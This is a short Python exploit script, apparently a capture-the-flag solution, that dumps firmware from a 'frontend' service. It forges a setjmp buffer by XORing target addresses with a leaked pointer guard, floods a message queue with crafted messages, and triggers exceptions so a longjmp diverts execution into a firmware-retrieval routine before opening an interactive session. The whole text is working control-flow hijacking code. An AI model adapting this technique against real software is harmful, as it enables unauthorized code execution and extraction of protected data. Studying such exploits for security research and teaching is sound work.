from exploit_base import * # Dump firmware from frontend by jumping to the middle of retr_firmware new_jmpbuf = bytearray(leak) new_jmpbuf[0x80:0x88] = p64(ptr_guard ^ (exe_base + 0x2da8)) # in retr_firmware new_jmpbuf[0x90:0x98] = p64(ptr_guard ^ (exe_base + 0x159e0)) new_stack = flat([ 0, 0, 0, exe_base + 0x159e0 + 0x30, 0, 0, # handle_exc p32(5) + p32(4), ]) new_stack = new_stack.ljust(256) # fill msgs for i in range(9): bad_msg(b"a") bad_msg(new_stack) # insert extra msg, throw exception on msg size menu("E") menu("A") sendint(999) # insert one more to overlap jmpbuf, throw exception on crc to longjmp bad_msg(new_jmpbuf) s.recvuntil(b"Retrieving firmware ...\n") s.interactive()